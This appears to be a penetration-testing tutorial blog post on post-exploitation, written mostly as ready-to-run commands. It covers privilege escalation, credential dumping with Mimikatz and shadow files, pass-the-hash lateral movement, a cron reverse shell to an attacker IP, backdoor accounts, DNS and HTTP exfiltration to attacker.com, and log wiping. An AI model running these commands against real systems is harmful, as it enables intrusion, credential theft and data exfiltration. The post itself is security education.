The Shell is Just the Beginning
Congratulations—you’ve exploited a vulnerability and gained access. You have a shell. But if you stop here, you’ve only scratched the surface. Post-Exploitation is where we demonstrate real business impact.
A web shell on a server is concerning. Domain Admin credentials with access to every system in the enterprise? That’s a career-ending finding for the security team (and a career-making one for you).
The Post-Exploitation Mindset
Once inside, your goals are:
- Privilege Escalation: Go from low-privilege user to admin/root.
- Credential Harvesting: Collect passwords, hashes, tokens.
- Lateral Movement: Pivot to other systems.
- Persistence: Maintain access across reboots.
- Data Exfiltration: Prove access to sensitive assets.
- Documentation: Record everything for the report.
Privilege Escalation
Your initial foothold is rarely administrator. Escalating privileges is essential.
Linux Privilege Escalation
Quick Wins
# Check sudo permissions
sudo -l
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check for writable /etc/passwd
ls -la /etc/passwd
# Kernel version (for kernel exploits)
uname -a
# Find credentials
grep -r "password" /etc/ 2>/dev/null
cat ~/.bash_history
Automated Enumeration
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Linux Smart Enumeration
./lse.sh -l 1
# Linux Exploit Suggester
./linux-exploit-suggester.sh
Common Vectors
- Sudo Misconfiguration:
sudo -lshows commands runnable as root. - SUID Binaries: GTFOBins lists exploitable binaries.
- Cron Jobs: Writable scripts run by root.
- Kernel Exploits: Dirty COW, DirtyCred.
- Docker Escape: User in docker group = root.
Windows Privilege Escalation
Quick Wins
# Current user
whoami /all
# System info
systeminfo
# Installed patches
wmic qfe
# Running services
wmic service list brief
# Unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\"
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Automated Enumeration
# WinPEAS
.\winPEAS.exe
# PowerUp
. .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt
.\Seatbelt.exe -group=all
Common Vectors
- Unquoted Service Paths: Place malicious exe in path.
- Weak Service Permissions: Replace service binary.
- AlwaysInstallElevated: Install MSI as SYSTEM.
- Token Impersonation: Potato attacks (JuicyPotato, PrintSpoofer).
- Credential Managers: Saved credentials in Windows Vault.
Credential Harvesting
Credentials are gold. They enable lateral movement and persistent access.
Windows Credential Harvesting
# Meterpreter
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
# Mimikatz (on Windows)
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # lsadump::dcsync /user:Administrator
# Secretsdump (remote)
secretsdump.py domain/user:password@192.168.1.100
Linux Credential Harvesting
# Shadow file (requires root)
cat /etc/shadow
# SSH keys
cat /home/*/.ssh/id_rsa
# History files
cat /home/*/.bash_history
# Application configs
cat /var/www/html/config.php
cat /etc/mysql/my.cnf
Cracking Harvested Hashes
# Identify hash type
hashid hash.txt
# Crack with Hashcat
hashcat -m 1000 ntlm_hashes.txt rockyou.txt
hashcat -m 1800 linux_shadow.txt rockyou.txt
# Crack with John
john --wordlist=rockyou.txt hashes.txt
Lateral Movement
Use harvested credentials to move through the network.
Pass-the-Hash (Windows)
# With crackmapexec
crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# With psexec
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
# With Evil-WinRM
evil-winrm -i 192.168.1.100 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
Pass-the-Ticket (Kerberos)
# Export tickets
mimikatz # sekurlsa::tickets /export
# Inject ticket
mimikatz # kerberos::ptt ticket.kirbi
# Use ticket
dir \\dc01\c$
SSH Key Reuse
# Found private key
chmod 600 id_rsa
ssh -i id_rsa user@192.168.1.200
RDP
# With credentials
xfreerdp /u:Administrator /p:Password123 /v:192.168.1.100
# With hash (Restricted Admin mode)
xfreerdp /u:Administrator /pth:31d6cfe0d16ae931b73c59d7e0c089c0 /v:192.168.1.100
Persistence
Maintain access for the duration of the engagement.
Linux Persistence
# SSH authorized_keys
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
# Cron backdoor
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1'" >> /var/spool/cron/root
# Backdoor user
useradd -m -s /bin/bash -G sudo backdoor
echo "backdoor:password" | chpasswd
Windows Persistence
# Registry Run key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\shell.exe"
# Scheduled Task
schtasks /create /tn "Updater" /tr "C:\Windows\Temp\shell.exe" /sc onlogon /ru SYSTEM
# Golden Ticket (requires domain compromise)
mimikatz # kerberos::golden /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-... /krbtgt:hash /ptt
Data Exfiltration
The final proof of impact—access to sensitive data.
What to Target
- Active Directory: Domain Admin = game over.
- Databases: Customer data, credentials.
- File Shares: Financial documents, HR records.
- Email: Executive communications.
- Source Code: Intellectual property.
Exfiltration Techniques
# Simple HTTP
python3 -m http.server 8000 # Attacker
curl http://192.168.1.50:8000/ -F "file=@secrets.txt" # Victim
# DNS exfiltration
cat secret.txt | xxd -p | while read line; do host $line.attacker.com; done
# Through legitimate services
# Upload to Dropbox, Google Drive, etc.
Proof Without Exfiltration
Sometimes you can’t extract data (legal, ethical, scope reasons). Document access instead:
- Screenshots of directory listings.
- File metadata (name, size, date).
- First/last lines of sensitive files.
- Record count from databases.
Covering Tracks (For Education Only)
Understanding detection helps build better defenses.
# Clear Linux logs
echo "" > /var/log/auth.log
# Clear bash history
history -c
echo "" > ~/.bash_history
# Clear Windows logs
wevtutil cl Security
wevtutil cl System
Note: In professional engagements, we don’t cover tracks. We document everything for the report. Blue teams need to know what to look for.
Wrapping Up the Engagement
Post-exploitation complete. Before moving to reporting:
- Remove Persistence: Delete backdoors, scheduled tasks.
- Clean Up Artifacts: Remove uploaded tools.
- Document Everything: Screenshots, command output, timeline.
- Debrief with Client: Preliminary findings discussion.
Summary
This concludes the Penetration Testing Explorer series. We’ve journeyed from methodology through reconnaissance, exploitation, and now post-exploitation.
Remember: The goal isn’t to “hack all the things.” It’s to demonstrate risk in a way that drives organizational change. Your report should make executives understand why they need to fund security initiatives.
Tharunaditya’s Security Note: The best pentesters are the ones who can explain findings to non-technical stakeholders. Technical skills get you in; communication skills make an impact.
Discussion